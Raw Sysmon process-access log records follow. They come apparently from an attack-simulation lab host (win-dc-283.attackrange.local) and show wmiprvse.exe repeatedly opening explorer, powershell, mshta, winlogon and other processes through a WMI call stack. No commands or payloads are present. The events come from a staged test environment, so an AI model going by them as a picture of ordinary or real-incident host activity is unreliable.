15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.663{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 